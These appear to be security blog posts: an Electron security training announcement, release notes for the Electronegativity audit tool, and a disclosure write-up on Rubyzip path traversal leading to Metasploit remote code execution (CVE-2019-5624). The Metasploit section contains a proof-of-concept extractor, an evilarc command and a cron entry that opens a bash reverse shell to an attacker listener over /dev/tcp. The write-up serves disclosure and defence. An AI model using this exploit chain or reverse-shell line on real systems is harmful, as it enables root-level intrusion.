Electron Security Workshop

2-Day Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-day workshop.


With the increasing popularity of the ElectronJS framework, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated: you need to know the framework, follow its evolution, and constantly update and devise defense-in-depth mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface analysis, examining the common root causes of misconfigurations and vulnerabilities. The class will be centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, nodeIntegration and sandbox bypasses, insecure preload bugs, prototype pollution attacks, affinity abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.

If you’re interested, check out this short teaser:

Audience Profile

Who should take this course?

  • JavaScript and Node.js Developers
  • Security Engineers
  • Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and a basic understanding of web application security (e.g. XSS) are required.

General Information

Attendees will receive a bundle with all material, including:

  • Workshop presentation (over 200 slides)
  • Code, exploits and artifacts of all exercises
  • Certificate of completion

This 2-day training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We’re a flexible security boutique and can further customize the agenda to your specific company’s needs.

Feel free to contact us at info@doyensec.com for scheduling your class!


Electronegativity 1.3.0 released!

After the first public release of Electronegativity, we had a great response from the community and the tool quickly became the baseline for Electron application security reviews for many professionals and organizations. This pushed us to keep improving Electronegativity and to expand our research in the field. Today we are proud to release version 1.3.0, with many new improvements and security checks for your Electron applications.


We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. It now counts over 40, featuring a new advanced check system that improves the tool’s detection capabilities by helping to sort out false positive and false negative findings. Here is a brief list of what’s new in the 1.3.0 release:

  • Every check now has an importance and an accuracy attribute, which help the auditor prioritize each finding. Consequently, we also introduced new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailored Electronegativity integration in your application security pipelines or build systems.
  • We introduced a new class of checks called GlobalChecks, which can dynamically set the severity and confidence of findings, or create new ones, by considering the inherent security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flag values, or the presence of the affinity flag used across different windows).
  • Variable scoping analysis capabilities have been added to inspect function and global variable content, when available.
  • A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
  • Electron’s newly introduced BrowserView component, meant to be an alternative to the webview tag, is now supported. The tool also detects the use of the nodeIntegrationInSubFrames experimental option for enabling Node.js support in sub-frames (e.g. an iframe inside a webview object).
  • Various bug fixes and new checks! (see below)

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge base entry containing information on risk and auditing strategy has been created for each class of vulnerability.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Because the renderer process is reused, certain webPreferences options are also shared between the web pages even when different values are specified for them. This can lead to unexpected security configuration overrides:

Affinity Property Vulnerability

In the above demo, the affinity set between the two BrowserWindow objects causes the nodeIntegration property value to be unintentionally shared. Electronegativity now issues a finding whenever this flag is used.
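
A minimal sketch of the pattern (window names and URLs are hypothetical; the actual demo code is not reproduced here):

const { app, BrowserWindow } = require('electron')

app.on('ready', () => {
  // Window meant to load remote content, with nodeIntegration disabled
  const untrustedWin = new BrowserWindow({
    webPreferences: { affinity: 'secondary', nodeIntegration: false }
  })

  // Trusted window sharing the same affinity, with nodeIntegration enabled.
  // Both renderers end up in the same process, so webPreferences such as
  // nodeIntegration may be unexpectedly shared between the two windows.
  const trustedWin = new BrowserWindow({
    webPreferences: { affinity: 'secondary', nodeIntegration: true }
  })

  untrustedWin.loadURL('https://untrusted.example')
  trustedWin.loadFile('index.html')
})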

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.
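
For illustration, here is the markup the check looks for, together with a programmatic equivalent from renderer code (the URL is a placeholder):

// Static form flagged by ALLOWPOPUPS_HTML_CHECK:
//   <webview src="https://untrusted.example" allowpopups></webview>
// The same guest can also be created dynamically:
const view = document.createElement('webview')
view.src = 'https://untrusted.example'
view.setAttribute('allowpopups', '') // the guest page may now open new windows
document.body.appendChild(view)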

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects whether security patches are available for the Electron version used by the target application. Starting with this release, we switched from manually updating a file of safe releases to a routine that automatically fetches the latest releases from Electron’s official repository at each run and determines whether security patches are available.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki pages.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks whether a Content Security Policy (CSP) is set as an additional layer of protection against cross-site scripting and data injection attacks. If a CSP is detected, it will look for weak directives using a new library based on the csp-evaluator.withgoogle.com online tool.
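
As a rough sketch of one common mitigation (the policy below is only an example), a restrictive CSP can be injected from the main process when it cannot be served as a response header:

const { app, session } = require('electron')

app.on('ready', () => {
  session.defaultSession.webRequest.onHeadersReceived((details, callback) => {
    callback({
      responseHeaders: {
        ...details.responseHeaders,
        // Example policy: restrict scripts and other resources to the app itself
        'Content-Security-Policy': ["default-src 'self'; script-src 'self'"]
      }
    })
  })
})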

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.
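
A hypothetical example of the kind of sink this check reports (the IPC channel and preview window are made up for illustration):

const { app, ipcMain, BrowserWindow } = require('electron')

app.on('ready', () => {
  const previewWindow = new BrowserWindow()

  // Attacker-influenced input reaching a dangerous sink: the user-supplied
  // string is executed verbatim in the preview window's renderer
  ipcMain.on('render-preview', (event, userSnippet) => {
    previewWindow.webContents.executeJavaScript(userSnippet)
  })
})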

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Check for mitigations set to limit the navigation flows

Detects whether the on() handler for the will-navigate and new-window events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under the full control of remote origins in case of accidental navigation.
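
A minimal sketch of such a mitigation, along the lines of Electron’s security recommendations (the allowed origin is a placeholder):

const { app } = require('electron')
const { URL } = require('url')

app.on('web-contents-created', (event, contents) => {
  contents.on('will-navigate', (navigationEvent, navigationUrl) => {
    // Only allow navigation within the expected origin
    if (new URL(navigationUrl).origin !== 'https://app.example.com') {
      navigationEvent.preventDefault()
    }
  })

  contents.on('new-window', (windowEvent, url) => {
    // Deny any window creation that was not explicitly allowed
    windowEvent.preventDefault()
  })
})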

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check whether Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling these warnings may hide the presence of misconfigurations or insecure patterns from developers.
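
For reference, this is the kind of setting the check detects, i.e. the warnings being force-disabled through the dedicated environment variable:

// Force-disabling Electron's console security warnings (discouraged)
process.env['ELECTRON_DISABLE_SECURITY_WARNINGS'] = 'true'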

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under the full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity also checks whether a setPermissionRequestHandler has been set.
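
A minimal sketch of such a handler (the allowed origin and permission are placeholders):

const { app, session } = require('electron')

app.on('ready', () => {
  session.defaultSession.setPermissionRequestHandler((webContents, permission, callback) => {
    const requestingUrl = webContents.getURL()
    // Only grant the permissions you expect, and only to origins you trust
    if (requestingUrl.startsWith('https://app.example.com/') && permission === 'notifications') {
      return callback(true)
    }
    callback(false) // deny everything else, including media access
  })
})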

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron security pitfalls affect your application and how to avoid them. We truly believe that Electron deserves a strong security community behind it, and that creating the right, robust tools to help this community is the first step towards improving the security posture of the whole Electron ecosystem.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella


On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry point for triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself, and the implications of such an issue in a popular piece of software: Metasploit.


Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376, where the developers implemented a different handling:

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe? is defined a few lines earlier as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While Entry#name_safe? is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

Running the PoC against an archive containing an absolute path entry:

$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

This results in a file being created at /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use, without actually verifying how the library works or how it is used in their codebase.

It would have been vulnerable anyway ¯\_(ツ)_/¯

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the + operator between Pathname objects and strings does not work the way many developers would expect, and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Because Pathname interprets the ../ sequences, the argument of Rubyzip’s Entry#extract call no longer contains any path traversal payload, resulting in a path that is mistakenly assumed to be “safe”. Since the gem does not perform any validation when a destination path is passed, exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix- and Windows-specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb file to the config/initializers folder, which will be loaded at web server (re)boot.

Attacking the attackers: Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that use the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in the zip.rb file (line 157), which is responsible for importing a Metasploit ZIP file:

 data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As with the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

  1. Create a file with the following content:
    * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  2. Generate the ZIP archive with the path traversal payload:
    python evilarc.py exploit --os unix -p etc/cron.d/
  3. Add a valid MSF workspace to the ZIP file (so that MSF will extract it; otherwise it will refuse to process the archive)
  4. Set up two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
  5. Log in to the MSF Web Interface
  6. Create a new “Project”
  7. Select “Import”, “From file”, choose the evil ZIP file and finally click the “Import” button
  8. Wait for the import process to finish
  9. Enjoy your reverse shell


Conclusions

If you are using Rubyzip, review how the library is used and perform additional validation of the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage                  Input by user?                      Vulnerable to path traversal?
entry.extract(path)    yes (path)                          yes
entry.extract(path)    partially (path is concatenated)    maybe
entry.extract()        partially (entry name)              no
entry.extract()        no                                  no

If you’re using Metasploit, it is time to patch. We look forward to seeing an MSF module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work was performed during a customer engagement and Doyensec’s 25% Research Time. As such, we would like to thank our customer and the Metasploit maintainers for their support.

If you’re interested in the topic, take a look at the following resources: